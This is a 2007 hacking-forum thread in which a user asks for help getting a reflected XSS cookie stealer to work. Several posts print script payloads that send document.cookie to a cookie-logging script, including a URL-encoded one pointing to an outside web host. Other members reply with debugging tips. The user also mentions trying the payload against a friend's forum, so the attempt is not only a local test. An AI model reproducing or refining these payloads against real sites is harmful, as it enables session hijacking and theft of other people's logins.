Donate to us via Paypal!
Never in the field of human conflict was so much owed by so many to so few. - Winston Churchill
Tuesday, October 20, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 89
Guests Online: 87
Members Online: 2

Registered Members: 129288
Newest Member: pizzo00186
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 00:14
Ive been recently playing around with a little web page i set up on my other computer and playing around with the effects of XSS

I have a basic search bar and made it vuln to XSS

what I put in the search bar redirects it to my cookie logger

the problem is its not logging the cookies.....Im using system meltdowns cookie stealer and I have changed the permisions so it can read and write by anyone....


<script>window.location=""http://localhost/xss/cookie.php?cookie="+document.cookie;</script>

thats the code im puting into my search bar it sends me to my page and my cookie grabber but it wont grab the cookie solutions ideas anyone?


and yes I have cookies enabled and it tells me the referer just not the cookie =(

and yes Ive read alot through google and milw0rm about xss


Edited by on 29-01-07 00:18
Author

RE: Help with My XSS

richohealey
Member



Posts: 1022
Location: #!/usr/local/bin/python
Joined: 01.05.06
Rank:
Monster
Posted on 29-01-07 00:19
is that it exaclty? do you walways put two " at the start?


bitchohealey at hotmail dot com skype:richohealey www.psych0tik.net
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 01:43
lmao
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 02:34
k i took that out and it still just logs the referrer but not the cookie
Author

RE: Help with My XSS

richohealey
Member



Posts: 1022
Location: #!/usr/local/bin/python
Joined: 01.05.06
Rank:
Monster
Posted on 29-01-07 02:42
if the logger wis written right, it should just grab and store the cookie POST_ variable.


write a test script that jut echo's it.

form there you can change it in increments so you know what's fucked



bitchohealey at hotmail dot com skype:richohealey www.psych0tik.net
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 03:40
http://localhostf/db/searchdb.html?iname=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fasaasd9.100webspace.net%2Fxss%2Fcookie.php%3Fvar%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E



thats what im getting for the referrer
and still no cookie though just the ip date and referrer
anymore suggestions =0
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 04:26
assuming I was using it in the right spot insidious it didnt work =(

I put the () escape function

here
<script>window.location=('http://localhostowns/xss/cookie.php?var='Wink+document.cookie;</script>


I then went on to put them on the document.cookie and it still didnt do anything *sighs*

Edited by on 29-01-07 04:30
Author

RE: Help with My XSS

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 29-01-07 06:06
... And your cookies work correctly? :right:


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-01-07 22:25
i dunno I think I just suck..... it wont grab the cookie from my friends forum either =(

I think the reason its not working is because its redirecting to my cookie grabber and that makes the grabber think its grabbing the cookie from my page set up and theres no cookies for that page

thoughts?

Edited by on 29-01-07 22:28
Author

RE: Help with My XSS


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-03-07 21:29
Don't redirect!